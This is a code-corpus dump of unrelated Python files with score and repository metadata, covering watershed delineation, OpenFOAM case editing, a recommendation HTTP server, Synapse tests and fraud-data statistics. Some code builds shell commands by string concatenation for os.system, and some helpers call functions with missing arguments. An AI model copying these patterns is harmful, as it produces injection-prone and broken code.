# Print Function for double linked list.
def PrintList(self):
temp = self.head
while(temp is not None):
print(temp.data,end=" ")
temp = temp.next
print('')
#code
if(__name__=="__main__"):
dlist = DoublyLinkedList()
arr = [8,2,3,1,7]
for i in arr:
dlist.Push(i)
dlist.PrintList()
| 4.28125
| 4
|
rwd_nhd/NHD_Rapid_Watershed_Delineation.py
|
WikiWatershed/RapidWatersheDelineation
| 8
|
12777666
|
<filename>rwd_nhd/NHD_Rapid_Watershed_Delineation.py
import sys
import os
import time
import subprocess
import gdal
import fiona
from NHD_RWD_Utilities import generate_moveoutletstostream_command, create_shape_from_point, \
extract_value_from_raster_point, extract_value_from_raster, get_gauge_watershed_command, get_watershed_attributes, \
purge, reproject_point
def Point_Watershed_Function(
longitude,
latitude,
snapping,
maximum_snap_distance,
pre_process_dir,
gage_watershed_raster,
gage_watershed_shapefile,
np,
taudem_dir,
mpi_dir,
output_dir):
overall_start_time = time.time()
start_time = overall_start_time
dir_main = os.path.join(str(pre_process_dir), 'Main_Watershed')
main_watershed = gage_watershed_shapefile
output_dir=os.path.join(dir_main,output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
os.chdir(dir_main)
infile_crs = []
with fiona.open(main_watershed + '.shp') as source:
projection = source.crs
infile_crs.append(projection)
os.chdir(output_dir)
log=open("log.txt","w")
log.write("Latitude: %s, Longitude %s\n" % (latitude,longitude) )
albers_y, albers_x = reproject_point(
(latitude, longitude),
# WGS 84 Latlong
from_epsg=4326,
# NAD83 / Conus Albers
to_epsg=5070)
# Create shape later when distance to stream is available
# create_shape_from_point((latitude, longitude), (albers_y, albers_x), "mypoint", infile_crs[0])
gage_watershed_rasterfile = os.path.join(dir_main, gage_watershed_raster)
# Extracting the ID from the gage watershed raster saves a significant amount of time:
# polygon searching is slow, whereas extracting a value from a raster at a point is not.
fg = int(extract_value_from_raster_point(
gage_watershed_rasterfile, albers_x, albers_y))
ID = fg
print(ID)
internaldrain=False
if ID is None or ID < 1:
# This internal drain logic relies on the following data
# regions.tif file in Main_watershed folder that has an ID in it for the NHDPlus grid processing region
# RegionsID folders in Subwatershed_ALL that has the corresponding region flow direction file named region_IDp.tif
# The strategy is to use the regions.tif file to identify the region the point falls within, then delineate the watershed using the full tiff file for that region.
# There is no joining of upstream watersheds as this is applied only for points not handled by the preprocessed gage watersheds and these points do not have upstream watersheds
regionsfile = os.path.join(dir_main, "regions.tif")
ID = int(extract_value_from_raster_point(
regionsfile, albers_x, albers_y))
if ID is None or ID < 1:
raise Exception('Point located outside the watershed.')
internaldrain=True
if(internaldrain):
print("Using internally draining function.\nRegion " + str(ID))
dir_name = 'Region'
sub_file_name = "Region_"
subwatershed_dir = os.path.join(str(pre_process_dir), 'Subwatershed_ALL', dir_name + str(ID))
distance_stream = 0
else:
dir_name = 'Subwatershed'
sub_file_name = "subwatershed_"
subwatershed_dir = os.path.join(str(pre_process_dir), 'Subwatershed_ALL', dir_name + str(ID))
dist_file = sub_file_name + str(ID) + "dist.tif"
dist_filename = os.path.join(subwatershed_dir, dist_file)
#shp_filename = os.path.join(output_dir, "mypoint.shp")
distance_stream = float(extract_value_from_raster_point(dist_filename, albers_x, albers_y))
create_shape_from_point((latitude, longitude), (albers_y, albers_x), "mypoint", infile_crs[0], distance_stream )
grid_name = sub_file_name + str(ID)
# add file name for attributes
ad8_file = grid_name + "ad8.tif"
ord_file = grid_name + "ord.tif"
plen_file = grid_name + "plen.tif"
tlen_file = grid_name + "tlen.tif"
grid_dir = subwatershed_dir
outlet_point = "mypoint"
new_gage_watershed_name = "local_subwatershed"
snaptostream = snapping
log.write("Identify subwatershed %s seconds \n" % (time.time() - start_time))
start_time = time.time()
if(not internaldrain):
if snaptostream == "1":
if ID > 0 and (distance_stream < float(maximum_snap_distance)):
distance_thresh=int(float(maximum_snap_distance)/30+10) # This is an integer number of grid cells to move and assumes 30 m cells. dist/30 is max number of cells and +10 adds a buffer to make sure we move to the stream regardless
else:
distance_thresh = 0
else:
distance_thresh = 0
cmd = generate_moveoutletstostream_command(
mpi_dir,
np,
taudem_dir,
grid_dir,
grid_name,
output_dir,
outlet_point,
distance_thresh)
#print(cmd)
os.system(cmd) # This was giving an input line is too long error in PC testing
#subprocess.check_call(cmd)
else:
# just recreate the New_Outlet file at the original location
create_shape_from_point((latitude, longitude), (albers_y, albers_x), "New_Outlet", infile_crs[0], distance_stream)
# To speed up internally draining watershed delineation, subset a region 11 km on either side of the point rather than the whole fdr grid
# gdal_translate -projwin ulx uly lrx lry inraster.tif outraster.tif
# From http://www.gdal.org/gdal_translate.html
# "Note: in GDAL 2.1.0 and 2.1.1, using -projwin with coordinates not aligned with pixels will result in a sub-pixel shift. This has been corrected in later versions."
# If this subpixel shift is a concern then need to upgrade.
infile= os.path.join(grid_dir,grid_name+"p.tif")
outfile="localp.tif"
ulx= str(albers_x - 11000.0)
lrx=str(albers_x + 11000.0)
uly=str(albers_y + 11000.0)
lry=str(albers_y - 11000.0)
cmd="gdal_translate -projwin " + ulx + " " + uly + " " + lrx + " " + lry + ' "' + infile + '" ' + outfile
# subprocess.check_call(cmd)
os.system(cmd)
os.chdir(output_dir)
outlet_moved_file = os.path.join(output_dir, "New_Outlet.shp")
cmd = get_gauge_watershed_command(
mpi_dir,
np,
taudem_dir,
grid_dir,
grid_name,
output_dir,
outlet_moved_file,
new_gage_watershed_name,
internaldrain)
print(cmd)
#subprocess.check_call(cmd)
os.system(cmd)
cmd = 'gdal_polygonize.py -8 local_subwatershed.tif -b 1' \
' -f "ESRI Shapefile"' \
' local_subwatershed.shp local_subwatershed GRIDCODE'
# The lines below are needed for testing on some PC's where paths conflict.
# cmd= 'C:\Python27\python "C:\Program Files\GDAL\gdal_polygonize.py" -8 local_subwatershed.tif -b 1' \
# ' -f "ESRI Shapefile"' \
# ' local_subwatershed.shp local_subwatershed GRIDCODE'
#print(cmd)
os.system(cmd)
cmd = 'ogr2ogr local_subwatershed_dissolve.shp local_subwatershed.shp' \
' -dialect sqlite' \
' -sql "SELECT GRIDCODE, ST_Union(geometry) as geometry' \
' FROM local_subwatershed GROUP BY GRIDCODE"' \
' -nln results -overwrite'
#print(cmd)
os.system(cmd)
log.write("Extract subwatershed %s seconds \n" % (time.time() - start_time))
start_time = time.time()
new_gage_watershed_dissolve = new_gage_watershed_name + "_dissolve"
myid = []
subid = []
src_ds = gdal.Open(gage_watershed_rasterfile)
gt = src_ds.GetGeoTransform()
rb = src_ds.GetRasterBand(1)
if(internaldrain):
num_lines=0
else:
num_lines = sum(1 for line in open('upwacoor.txt'))
if num_lines > 1:
with open("upwacoor.txt", "rt") as f:
for line in f:
x = float(line.split(',')[0])
y = float(line.split(',')[1])
mx = x
my = y
# using this approach is the fastest than others such as using gdallocation info or extract raster
px = int((mx - gt[0]) / gt[1]) # x pixel
py = int((my - gt[3]) / gt[5]) # y pixel
pixel_data = rb.ReadAsArray(px, py, 1, 1) # Assumes 16 bit int aka 'short'
pixel_val = pixel_data[0, 0] # use the 'short' format code (2 bytes) not int (4 bytes)
myid.append(int(pixel_val))
subid = list(set(myid))
log.write("Identify upstream watersheds %s seconds \n" % (time.time() - start_time))
start_time = time.time()
# compli_watershed_IDs = [] # was subid's > 0 DGT 11/13/16 adds requirement that must be in upcatchids.txt
# if ID > 0 and num_lines > 1:
# compli_watershed_IDs = [i for i in subid if i > 0]
# len_comp = len(subid)
# else:
# len_comp = -1
# DGT replaced the above with the below
if(internaldrain):
len_comp=0
else:
with open(os.path.join(grid_dir, "upcatchids.txt"), 'r') as f:
lines = f.read().splitlines()
upcatchids = [int(x) for x in lines]
compli_watershed_IDs=[val for val in subid if val in upcatchids]
len_comp=len(compli_watershed_IDs)
if len_comp > 0:
print ("Up stream edge was reached")
sub_water_file = []
lc_watershed = os.path.join(output_dir, new_gage_watershed_dissolve + '.shp')
sub_water_file.append(lc_watershed)
for i in compli_watershed_IDs:
subwater_dir = os.path.join(str(pre_process_dir), 'Subwatershed_ALL', 'Subwatershed' + str(i))
com_watershed = "Simple_watershed" + str(i)
com_file=os.path.join(subwater_dir, com_watershed + '.shp')
if os.path.isfile(com_file):
sub_water_file.append(com_file)
os.chdir(output_dir)
for x in range(1, len(sub_water_file)):
cmd = 'ogr2ogr -update -append' + " "+sub_water_file[0] + " " + sub_water_file[x]
#print(cmd)
os.system(cmd)
cmd = 'ogr2ogr New_Point_Watershed.shp local_subwatershed_dissolve.shp' \
' -dialect sqlite' \
' -sql "SELECT GRIDCODE, ST_Union(geometry) as geometry' \
' FROM local_subwatershed_dissolve"'
#print(cmd)
os.system(cmd)
else:
print ("Up stream edge was Not reached")
os.chdir(output_dir)
cmd = 'ogr2ogr New_Point_Watershed.shp local_subwatershed_dissolve.shp' \
' -dialect sqlite ' \
' -sql "SELECT GRIDCODE, ST_Union(geometry) as geometry' \
' FROM local_subwatershed_dissolve GROUP BY GRIDCODE"'
#print(cmd)
os.system(cmd)
log.write("Join upstream watersheds %s seconds \n" % (time.time() - start_time))
start_time = time.time()
get_watershed_attributes(
'New_Outlet.shp',
'New_Point_Watershed.shp',
ad8_file,
plen_file,
tlen_file,
ord_file,
subwatershed_dir,
output_dir)
log.write("Calculate watershed attributes time %s seconds \n" % (time.time() - start_time))
start_time = time.time()
# cleanup the output directory
pattern = "^local"
path = output_dir
purge(path, pattern)
os.remove('upwacoor.txt')
log.write("Clean up time %s seconds \n" % (time.time() - start_time))
log.write("Overall time %s seconds \n" % (time.time() - overall_start_time))
log.close()
if __name__ == '__main__':
Point_Watershed_Function(*sys.argv[1:])
| 2.25
| 2
|
konfi/__init__.py
|
gieseladev/konfi
| 1
|
12777667
|
"""konfi is a config parser."""
from .converter import ComplexConverterABC, ConversionError, ConverterABC, \
ConverterFunc, ConverterType, convert_value, has_converter, \
register_converter, unregister_converter
from .field import Field, MISSING, NoDefaultValue, UnboundField, ValueFactory, field
from .loader import Loader, SourceError
from .source import FieldError, MultiPathError, PathError, SourceABC
from .sources import *
from .templ import create_object_from_template, fields, get_field, is_template, is_template_like, template
# load built-in converters
from . import converters
__version__ = "0.2.1"
__author__ = "<NAME>."
default_loader = Loader()
set_sources = default_loader.set_sources
load = default_loader.load
| 1.8125
| 2
|
src/setFunctions.py
|
hpsim/OBR
| 0
|
12777668
|
#!/usr/bin/env python3
from subprocess import check_output
def sed(fn, in_reg_exp, out_reg_exp, inline=True):
""" wrapper around sed """
ret = check_output(["sed", "-i", "s/" + in_reg_exp + "/" + out_reg_exp + "/g", fn])
def clean_block_from_file(fn, block_starts, block_end, replace):
""" cleans everything from block_start to block_end and replace it """
with open(fn, "r") as f:
lines = f.readlines()
with open(fn, "w") as f:
skip = False
for line in lines:
is_start = [block_start in line for block_start in block_starts]
if any(is_start):
skip = True
if skip and block_end in line:
skip = False
f.write(replace)
if not skip:
f.write(line)
def read_block_from_file(fn, block_starts, block_end):
ret = []
with open(fn, "r") as f:
lines = f.readlines()
started = False
for line in lines:
is_start = [block_start in line for block_start in block_starts]
if started:
ret.append(line)
if any(is_start):
ret.append(line)
started = True
if started and block_end in line:
return ret
return []
def find_in_block(fn, field, keyword, default):
block = read_block_from_file(fn, ['"' + field + '.*"', field + "\n"], "}")
for line in block:
for token in line.split(";"):
if keyword in token:
return token.split()[-1]
return default
def get_executor(fn, field):
return find_in_block(fn, field, "executor", "Serial")
def get_matrix_solver(fn, field):
return find_in_block(fn, field, "solver", "unknown")
def get_preconditioner(fn, field):
return find_in_block(fn, field, "preconditioner", "unknown")
def set_cells(blockMeshDict, old_cells, new_cells):
""" """
sed(blockMeshDict, old_cells, new_cells)
def set_mesh_boundary_type_to_wall(blockMeshDict):
""" """
print("DEPRECATED")
sed(blockMeshDict, "type[ ]*cyclic", "type wall")
def set_p_init_value(p):
""" """
sed(p, "type[ ]*cyclic;", "type zeroGradient;")
def set_U_init_value(U):
""" """
sed(U, "type[ ]*cyclic;", "type fixedValue;value uniform (0 0 0);")
def add_libOGL_so(controlDict):
with open(controlDict, "a") as ctrlDict_handle:
ctrlDict_handle.write('libs ("libOGL.so");')
def get_process(cmd):
try:
return check_output(cmd).decode("utf-8")
except Exception as e:
print(e)
def get_end_time(controlDict):
import re
ret = check_output(["grep", "endTime", controlDict])
ret = ret.decode("utf-8").replace(";", "").replace("\n", "")
ret = re.compile(r"[.0-9]+").findall(ret)
return ret[0]
def get_application_solver(controlDict):
ret = check_output(["grep", "application", controlDict])
return ret.decode("utf-8").split()[-1].replace(";", "")
def set_write_interval(controlDict, interval):
sed(
controlDict,
"^writeInterval[ ]*[0-9.]*;",
"writeInterval {};".format(interval),
)
def set_number_of_subdomains(decomposeParDict, subDomains):
print("setting number of subdomains", subDomains, decomposeParDict)
sed(
decomposeParDict,
"numberOfSubdomains[ ]*[0-9.]*;",
"numberOfSubdomains {};".format(subDomains),
)
def set_end_time(controlDict, endTime):
sed(controlDict, "^endTime[ ]*[0-9.]*;", "endTime {};".format(endTime))
def get_number_of_subDomains(case):
import os
_, folder, _ = next(os.walk(case))
return len([f for f in folder if "processor" in f])
def read_block(blockMeshDict):
import re
ret = check_output(["grep", "hex", blockMeshDict]).decode("utf-8")
num_cells = re.findall("[(][0-9 ]*[)]", ret)[1]
return list(map(int, re.findall("[0-9]+", num_cells)))
def read_deltaT(controlDict):
ret = (
check_output(["grep", "deltaT", controlDict])
.split()[-1]
.decode("utf-8")
.replace(";", "")
)
return float(ret)
def set_deltaT(controlDict, deltaT):
sed(controlDict, "deltaT[ ]*[0-9.]*", "deltaT {}".format(deltaT))
def set_writeInterval(controlDict, writeInterval):
sed(controlDict, "writeInterval[ ]*[0-9.]*", "writeInterval " + str(writeInterval))
def add_or_set_solver_settings(fvSolution, field, keyword, value):
# TODO check if keyword is already present
block = read_block_from_file(fvSolution, ['"' + field + '.*"{'], "}")
# clear_solver_settings(fvSolution, field)
block.insert(1, "{} {};\n".format(keyword["name"], value))
clean_block_from_file(fvSolution, [field + '.*"{'], "}\n", " ".join(block[:-1]))
def clear_solver_settings(fvSolution, field):
clean_block_from_file(
fvSolution,
[" {}\n".format(field), '"' + field + '.*"'],
" }\n",
field + "{}\n",
)
def ensure_path(path):
print("creating", path)
check_output(["mkdir", "-p", path])
| 2.703125
| 3
|
renamer/renamerView.py
|
UnzaiRyota/pairpro
| 0
|
12777669
|
<gh_stars>0
# -*- coding: utf-8 -*-
import os
from PySide2.QtWidgets import *
from PySide2.QtGui import *
from PySide2.QtCore import *
from PySide2.QtUiTools import *
absPath = os.path.dirname(__file__)
uiPath = os.path.join(absPath, "view.ui")
uiclass, baseclass = loadUiType(uiPath)
class uiClass(baseclass, uiclass):
def __init__(self, parent=None, *args, **kwargs):
super(uiClass, self).__init__(parent, *args, **kwargs)
self.setupUi(self)
class view(QMainWindow):
def __init__(self, parent=None, *args, **kwargs):
super(view, self).__init__(parent, *args, **kwargs)
self.parent = parent
self.setCentralWidget(uiClass())
| 2.046875
| 2
|
ml/webserver.py
|
Censored-Data/VK-Gaming
| 3
|
12777670
|
<gh_stars>1-10
from library import config, get_recomendation_games, get_recomendation_users, get_cs_team
from http.server import HTTPServer, BaseHTTPRequestHandler
from io import BytesIO
from urllib.parse import urlparse, parse_qs
import json
import pandas as pd
from sklearn.neighbors import NearestNeighbors
import pickle
new_data = pd.read_csv('new_data.csv', index_col=0)
model = pickle.load(open('model.sav', 'rb'))
import requests
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
print(self.path)
print(urlparse(self.path).query)
print(self.headers)
query_components = parse_qs(urlparse(self.path).query)
user_id = self.headers['user_id']
path = self.headers['path']
return_data = ''
if path == 'user_recomendation':
return_data = json.dumps(json.loads(get_recomendation_users(user_id))['id'])
if path == 'game_recomendation':
return_data = json.dumps(json.loads(get_recomendation_games(user_id)))
print(return_data)
if path == 'cs_team':
return_data = get_cs_team(user_id)
response = BytesIO()
response.write(return_data.encode())
self.wfile.write(response.getvalue())
httpd = HTTPServer(('172.16.17.32', 4002), SimpleHTTPRequestHandler)
httpd.serve_forever()
| 2.609375
| 3
|
tests/federation/test_pdu_codec.py
|
uroborus/synapse
| 1
|
12777671
|
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tests import unittest
from synapse.federation.pdu_codec import (
PduCodec, encode_event_id, decode_event_id
)
from synapse.federation.units import Pdu
#from synapse.api.events.room import MessageEvent
from synapse.server import HomeServer
from mock import Mock
class PduCodecTestCase(unittest.TestCase):
def setUp(self):
self.hs = HomeServer("blargle.net")
self.event_factory = self.hs.get_event_factory()
self.codec = PduCodec(self.hs)
def test_decode_event_id(self):
self.assertEquals(
("foo", "bar.com"),
decode_event_id("<EMAIL>", "A")
)
self.assertEquals(
("foo", "bar.com"),
decode_event_id("foo", "bar.com")
)
def test_encode_event_id(self):
self.assertEquals("A@B", encode_event_id("A", "B"))
def test_codec_event_id(self):
event_id = "<EMAIL>"
self.assertEquals(
event_id,
encode_event_id(*decode_event_id(event_id, None))
)
pdu_id = ("aa", "bb.com")
self.assertEquals(
pdu_id,
decode_event_id(encode_event_id(*pdu_id), None)
)
def test_event_from_pdu(self):
pdu = Pdu(
pdu_id="foo",
context="rooooom",
pdu_type="m.room.message",
origin="bar.com",
ts=12345,
depth=5,
prev_pdus=[("alice", "bob.<EMAIL>")],
is_state=False,
content={"msgtype": u"test"},
)
event = self.codec.event_from_pdu(pdu)
self.assertEquals("<EMAIL>", event.event_id)
self.assertEquals(pdu.context, event.room_id)
self.assertEquals(pdu.is_state, event.is_state)
self.assertEquals(pdu.depth, event.depth)
self.assertEquals(["<EMAIL>"], event.prev_events)
self.assertEquals(pdu.content, event.content)
def test_pdu_from_event(self):
event = self.event_factory.create_event(
etype="m.room.message",
event_id="gargh_id",
room_id="rooom",
user_id="sender",
content={"msgtype": u"test"},
)
pdu = self.codec.pdu_from_event(event)
self.assertEquals(event.event_id, pdu.pdu_id)
self.assertEquals(self.hs.hostname, pdu.origin)
self.assertEquals(event.room_id, pdu.context)
self.assertEquals(event.content, pdu.content)
self.assertEquals(event.type, pdu.pdu_type)
event = self.event_factory.create_event(
etype="m.room.message",
event_id="<EMAIL>",
room_id="rooom",
user_id="sender",
content={"msgtype": u"test"},
)
pdu = self.codec.pdu_from_event(event)
self.assertEquals("gargh_id", pdu.pdu_id)
self.assertEquals("bob.com", pdu.origin)
self.assertEquals(event.room_id, pdu.context)
self.assertEquals(event.content, pdu.content)
self.assertEquals(event.type, pdu.pdu_type)
def test_event_from_state_pdu(self):
pdu = Pdu(
pdu_id="foo",
context="rooooom",
pdu_type="m.room.topic",
origin="bar.com",
ts=12345,
depth=5,
prev_pdus=[("alice", "bob.com")],
is_state=True,
content={"topic": u"test"},
state_key="",
)
event = self.codec.event_from_pdu(pdu)
self.assertEquals("<EMAIL>", event.event_id)
self.assertEquals(pdu.context, event.room_id)
self.assertEquals(pdu.is_state, event.is_state)
self.assertEquals(pdu.depth, event.depth)
self.assertEquals(["<EMAIL>"], event.prev_events)
self.assertEquals(pdu.content, event.content)
self.assertEquals(pdu.state_key, event.state_key)
def test_pdu_from_state_event(self):
event = self.event_factory.create_event(
etype="m.room.topic",
event_id="gargh_id",
room_id="rooom",
user_id="sender",
content={"topic": u"test"},
)
pdu = self.codec.pdu_from_event(event)
self.assertEquals(event.event_id, pdu.pdu_id)
self.assertEquals(self.hs.hostname, pdu.origin)
self.assertEquals(event.room_id, pdu.context)
self.assertEquals(event.content, pdu.content)
self.assertEquals(event.type, pdu.pdu_type)
self.assertEquals(event.state_key, pdu.state_key)
| 2
| 2
|
data/utils_data.py
|
lmzintgraf/MultiMAuS
| 14
|
12777672
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from os.path import join, dirname, exists
from os import makedirs, pardir
FOLDER_REAL_DATA = join(dirname(__file__), 'real_data')
FOLDER_SIMULATOR_INPUT = join(dirname(__file__), 'simulator_input')
FOLDER_REAL_DATA_ANALYSIS = join(FOLDER_REAL_DATA, 'analysis')
FOLDER_SIMULATOR_LOG = join(pardir, 'experiments/results')
# create the above folders if they don't exist yet
for folder in [FOLDER_REAL_DATA, FOLDER_SIMULATOR_INPUT, FOLDER_SIMULATOR_LOG, FOLDER_REAL_DATA_ANALYSIS]:
if not exists(folder):
makedirs(folder)
FILE_ANONYMIZED_DATASET = join(FOLDER_REAL_DATA, 'anonymized_dataset.csv')
FILE_REAL_LOG = join(FOLDER_REAL_DATA, 'transaction_log.csv')
FILE_SIMULATOR_LOG = join(FOLDER_SIMULATOR_LOG, 'transaction_log.csv')
def get_dataset(file):
"""
Returns the dataset (full), and subsets for non-fraud and fraud only.
:param file:
:return:
"""
# get dataset from file
dataset01 = pd.read_csv(file)
# cast "date" column datetime objects
dataset01["Global_Date"] = pd.to_datetime(dataset01["Global_Date"])
dataset01["Local_Date"] = pd.to_datetime(dataset01["Local_Date"])
# for convenience split the dataset into non-fraud(0)/fraud(1)
dataset0 = dataset01[dataset01["Target"] == 0]
dataset1 = dataset01[dataset01["Target"] == 1]
# give the datasets names
dataset01.name = 'all'
dataset0.name = 'non-fraud'
dataset1.name = 'fraud'
return dataset01, dataset0, dataset1
def get_real_dataset():
file = join(FOLDER_REAL_DATA, 'transaction_log.csv')
return get_dataset(file)
def get_simulated_dataset(result_idx):
"""
Returns the dataset (full), and subsets for non-fraud and fraud only.
:param result_idx: index prefix of the simulator transaction log to load
:return:
"""
file = join(FOLDER_SIMULATOR_LOG, '{}_transaction_log.csv'.format(result_idx))
return get_dataset(file)
def get_real_data_stats():
datasets = get_real_dataset()
return get_data_stats(datasets)
def get_simulated_data_stats(result_idx):
datasets = get_simulated_dataset(result_idx)
return get_data_stats(datasets)
def get_data_stats(datasets):
data_stats_cols = ['all', 'non-fraud', 'fraud']
data_stats = pd.DataFrame(columns=data_stats_cols)
data_stats.loc['transactions'] = [d.shape[0] for d in datasets]
data_stats.loc['transactions/hour'] = [round(d['Local_Date'].apply(lambda x: x.hour).value_counts().sum()/24/366, 2) for d in datasets]
data_stats.loc['transactions/day'] = [round(d['Local_Date'].apply(lambda x: x.day).value_counts().sum() / 366, 2) for d in datasets]
data_stats.loc['transactions/week'] = [round(d['Local_Date'].apply(lambda x: x.week).value_counts().sum() / 52, 2) for d in datasets]
data_stats.loc['transactions/month'] = [round(d['Local_Date'].apply(lambda x: x.month).value_counts().sum() / 12, 2) for d in datasets]
data_stats.loc['cards'] = [len(d["CardID"].unique()) for d in datasets]
data_stats.loc['cards, single use'] = [sum(d["CardID"].value_counts() == 1) for d in datasets]
data_stats.loc['cards, multi use'] = [sum(d["CardID"].value_counts() > 1) for d in datasets]
cards_genuine = datasets[1]['CardID'].unique()
cards_fraud = datasets[2]['CardID'].unique()
data_stats.loc['fraud cards in genuine'] = ['-', '-', len(np.intersect1d(cards_genuine, cards_fraud)) / len(cards_fraud)]
data_stats.loc['first transaction'] = [min(d["Global_Date"]).date() for d in datasets]
data_stats.loc['last transaction'] = [max(d["Global_Date"]).date() for d in datasets]
data_stats.loc['min amount'] = [min(d["Amount"]) for d in datasets]
data_stats.loc['max amount'] = [max(d["Amount"]) for d in datasets]
data_stats.loc['avg amount'] = [np.average(d["Amount"]) for d in datasets]
data_stats.loc['num merchants'] = [len(d["MerchantID"].unique()) for d in datasets]
data_stats.loc['countries'] = [len(d["Country"].unique()) for d in datasets]
data_stats.loc['currencies'] = [len(d["Currency"].unique()) for d in datasets]
data_stats.loc['min trans/card'] = [min(d["CardID"].value_counts()) for d in datasets]
data_stats.loc['max trans/card'] = [max(d["CardID"].value_counts()) for d in datasets]
data_stats.loc['avg trans/card'] = [np.average(d["CardID"].value_counts()) for d in datasets]
return data_stats
def get_grouped_prob(group_by, col_name):
grouped_prob = get_dataset()[0].groupby([group_by, col_name]).size()
grouped_prob = grouped_prob.groupby(level=0).apply(lambda x: x / sum(x))
return grouped_prob
def get_transaction_dist(col_name):
""" calculate fractions of transactions for given column """
possible_vals = get_dataset()[0][col_name].value_counts().unique()
trans_count = pd.DataFrame(0, index=possible_vals, columns=['all', 'non-fraud', 'fraud'])
trans_count['all'] = get_dataset()[0][col_name].value_counts().value_counts()
trans_count['non-fraud'] = get_dataset()[1][col_name].value_counts().value_counts()
trans_count['fraud'] = get_dataset()[2][col_name].value_counts().value_counts()
trans_count = trans_count.fillna(0)
trans_count /= np.sum(trans_count.values, axis=0)
# save
trans_count.to_csv(join(FOLDER_SIMULATOR_INPUT, '{}_fract-dist.csv'.format(col_name)), index_label=False)
# print
print(col_name)
print(trans_count)
print("")
return trans_count
def plot_hist_num_transactions(trans_frac, col_name):
""" method to plot histogram of number of transactions for a column """
plt.figure(figsize=(10, 7))
for i in range(3):
plt.subplot(3, 1, i+1)
plt.bar(range(trans_frac.shape[0]), trans_frac.values[:, i], label=trans_frac.index[i])
plt.ylabel('num transactions')
if i == 2:
plt.xlabel(col_name)
plt.savefig(join(FOLDER_SIMULATOR_INPUT, '{}_num-trans_hist'.format(col_name)))
plt.close()
def plot_bar_trans_prob(trans_frac, col_name, file_name=None):
""" method to plot bar plot of number of transactions for a column """
plt.figure()
bottoms = np.vstack((np.zeros(3), np.cumsum(trans_frac, axis=0)))
for i in range(trans_frac.shape[0]):
plt.bar((0, 1, 2), trans_frac.values[i], label=trans_frac.index[i], bottom=bottoms[i])
plt.xticks([0, 1, 2], ['all', 'non-fraud', 'fraud'])
h = plt.ylabel('%')
h.set_rotation(0)
plt.title("{} Distribution".format(col_name))
plt.legend()
if not file_name:
file_name = col_name
plt.savefig(join(FOLDER_SIMULATOR_INPUT, '{}_num-trans_bar'.format(file_name)))
plt.close()
| 3.0625
| 3
|
django_cat_app/models.py
|
NikolasE/telegram_catbot
| 0
|
12777673
|
<filename>django_cat_app/models.py
from django.db import models
# we simply count the number of cat images we sent to a person
# (we use first name as user_id which will create collisions, but also adds privacy by design)
class UserLog(models.Model):
user_id = models.CharField(max_length=100)
cat_count = models.IntegerField(default=0)
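# Hypothetical usage sketch (not part of the original app): bump the counter whenever a
# cat image is sent to a user, creating the row on first contact. `first_name` is an
# assumed variable holding the sender's first name.
#
# log, _ = UserLog.objects.get_or_create(user_id=first_name)
# log.cat_count += 1
# log.save()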
| 2.390625
| 2
|
products/admin.py
|
BassamMismar/store
| 0
|
12777674
|
<reponame>BassamMismar/store<gh_stars>0
from django.contrib import admin
from .models import Product
| 1.039063
| 1
|
scripts/const/consts.py
|
jiamingli9674/Intelligent-Checkout-System
| 2
|
12777675
|
<gh_stars>1-10
import os
SCRIPT_ROOT_DIR = os.getcwd()
ROOT_DIR = os.path.dirname(SCRIPT_ROOT_DIR)
IMAGE_DIR = os.path.join(ROOT_DIR, 'images')
ANTI_SPOOFING_MODELS_DIR = os.path.join(ROOT_DIR, "models", "anti_spoof_models")
DATA_DIR = os.path.join(ROOT_DIR, "data")
FACE_DETECTION_CAFFE_MODEL = os.path.join(ROOT_DIR, "models", "face_detection_model", "Widerface-RetinaFace.caffemodel")
FACE_DETECTION_CAFFE_WEIGHTS = os.path.join(ROOT_DIR, "models", "face_detection_model", "deploy.prototxt")
FACE_DISTANCE_THRESHOLD = 0.5
UNKNOWN = "unknow"
SKIP_FRAMES = 5
PICKEL_FILE_NAME = "face_encodings.pkl"
FACE_ID_NO_PEOPLE_EXIST = -1
FACE_ID_MORE_THAN_ONE_PEOPLE = -2
FACE_ID_ENCODING_SUCESS = 0
| 1.796875
| 2
|
rvpy/__init__.py
|
TimothyKBook/distributions
| 1
|
12777676
|
<reponame>TimothyKBook/distributions
from .distribution import Distribution
from .normal import Normal, StandardNormal, LogNormal
from .binomial import Bernoulli, Binomial
from .cuniform import CUniform
from .gamma import Gamma, Exponential, ChiSq
from .beta import Beta
from .t import T
from .f import F
from .cauchy import Cauchy, StandardCauchy
from .poisson import Poisson
from .duniform import DUniform
from .laplace import Laplace
from .weibull import Weibull, Rayleigh
from .negbin import NegativeBinomial, Geometric
from .hypergeom import Hypergeometric
from .pareto import Pareto
from .logistic import Logistic, LogLogistic
from .gompertz import Gompertz
from .gumbel import Gumbel
from .degenerate import Degenerate
from .transformations import abs, exp, log, sqrt, pow
__all__ = [
'Normal', 'StandardNormal', "LogNormal",
'Bernoulli', 'Binomial',
'CUniform',
'Gamma', 'ChiSq', 'Exponential',
'Beta',
'T',
'F',
'Laplace',
'Cauchy', 'StandardCauchy',
'Poisson',
'DUniform',
'Weibull', 'Rayleigh',
'NegativeBinomial', 'Geometric',
'Hypergeometric',
'Pareto',
'Logistic', 'LogLogistic',
'Gompertz',
'Gumbel',
'Degenerate',
'abs', 'exp', 'log', 'sqrt', 'pow'
]
__version__ = '0.3'
| 2.078125
| 2
|
KMtorch/helpers.py
|
mscipio/KMtorch
| 1
|
12777677
|
<gh_stars>1-10
import pycuda.driver as drv
import torch
import numpy as np
__all__ = ['Holder','Utils']
class Holder(drv.PointerHolderBase):
def __init__(self, t):
super(drv.PointerHolderBase, self).__init__()
self.t = t
self.gpudata = t.data_ptr()
def get_pointer(self):
return self.t.data_ptr()
class Utils():
def checkInputs(self, var):
if isinstance(var, torch.Tensor):
if var.is_cuda:
var_out = var.type(torch.cuda.FloatTensor)
else:
var_out = var.type(torch.cuda.FloatTensor).cuda()
else:
var_out = torch.from_numpy(np.asarray(var)).type(torch.cuda.FloatTensor).cuda()
return var_out
| 2.21875
| 2
|
invprob/optim.py
|
